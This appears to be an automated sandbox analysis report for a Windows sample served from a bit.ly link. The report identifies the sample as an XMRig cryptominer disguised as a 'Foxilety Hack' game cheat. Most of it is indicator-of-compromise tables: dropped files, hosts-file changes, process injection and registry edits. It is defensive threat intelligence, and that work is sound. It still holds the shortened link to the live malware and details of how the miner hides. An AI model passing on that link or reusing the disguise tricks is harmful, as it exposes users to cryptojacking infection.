xmrig | hxxps://bit[.]ly/3wqtWLQ

Analysis

max time kernel
202s
max time network
198s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2022 21:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://bit.ly/3wqtWLQ

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5024-228-0x00007FF77DF40000-0x00007FF77E734000-memory.dmp	xmrig
behavioral2/memory/5024-230-0x00007FF77DF40000-0x00007FF77E734000-memory.dmp	xmrig

Drops file in Drivers directory 4 IoCs

Processes:

Foxilety Hack.exeFoxilety Hack.exeFoxilety Hack.exeupdater.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	Foxilety Hack.exe
File created	C:\Windows\system32\drivers\etc\hosts	Foxilety Hack.exe
File created	C:\Windows\system32\drivers\etc\hosts	Foxilety Hack.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 4 IoCs

Processes:

Foxilety Hack.exeFoxilety Hack.exeupdater.exeFoxilety Hack.exe

pid process

3660 Foxilety Hack.exe
3020 Foxilety Hack.exe
1528 updater.exe
1140 Foxilety Hack.exe

pid	process
3660	Foxilety Hack.exe
3020	Foxilety Hack.exe
1528	updater.exe
1140	Foxilety Hack.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/5024-228-0x00007FF77DF40000-0x00007FF77E734000-memory.dmp	upx
behavioral2/memory/5024-230-0x00007FF77DF40000-0x00007FF77E734000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 1528 set thread context of 4336	1528	updater.exe	conhost.exe
PID 1528 set thread context of 5024	1528	updater.exe	conhost.exe

Drops file in Program Files directory 6 IoCs

Processes:

Foxilety Hack.exeFoxilety Hack.exeFoxilety Hack.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	Foxilety Hack.exe
File created	C:\Program Files\Google\Chrome\updater.exe	Foxilety Hack.exe
File created	C:\Program Files\Google\Chrome\updater.exe	Foxilety Hack.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = e8baa059b9aed801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 58 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3970730588"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30986347"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{14B35307-3C5F-11ED-B696-CA2A13AD51D0} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "370826438"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3966755853"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3970730588"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\google.com	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00a42efd6bd0d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30021efd6bd0d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b142160000000002000000000010660000000100002000000045ea014c48eb27606bd9988721ff61a801d579128b38f5304af323ee03c210a8000000000e8000000002000020000000a38be93ca622b6014815977b94154875c4964415dd58ad1c469fe4a05100725b20000000c87fd8b44bca3b3451b4c4a97e7031b1c60158a7770b574177c8c7fdfc0c98f540000000469c8667e1875d9e6f91ef7aa571dd2a36bcda73059a74928ef5f63a5ced571137f325bbdeb2cf453d8344ab8d1a9ecb1b9d1159942a09b5225b160953e27095	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30986347"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\drive.google.com\ = "6"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3966755853"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30986347"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "6"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{B298A6F3-EA80-44A6-9C0C-3D9EC62E1AA6}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\drive.google.com\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "6"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DOMStorage\drive.google.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b14216000000000200000000001066000000010000200000004ddab1c9f46d349638aceb73aaaeaa05e72b16b77106c8638f2f432f420bb2e4000000000e8000000002000020000000fc4a208b5d898d6fd166f7df7bbbccb9f6ec9a19a37832ca6672a83dd3bf231320000000b42b1cfb1a2a34c40c3ff24705af68675876f2d76bed96abbd78a170ace30a87400000008bad658c54c4b5e1f2cbe6ba1779a208452bfbd4d3c97d407002af75195d0315ff6e037e68644dcf69fbcbaeb1ac9cbada7839ed94c97e5f1415fadc439a0b8a	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\google.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30986347"	iexplore.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies registry class 64 IoCs

Processes:

OpenWith.exeiexplore.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Applications	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\웢쓱栀耀\ = "rar_auto_file"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 8c003100000000000c55caa2110050524f4752417e310000740009000400efbe874fdb490c55caa22e0000003f0000000000010000000000000000004a00000000001e49aa00500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Applications\7zFM.exe\shell\open	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\印꿒翻	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Applications\7zFM.exe\shell\open\command	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\였ᴝǯ\ = "rar_auto_file"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	OpenWith.exe
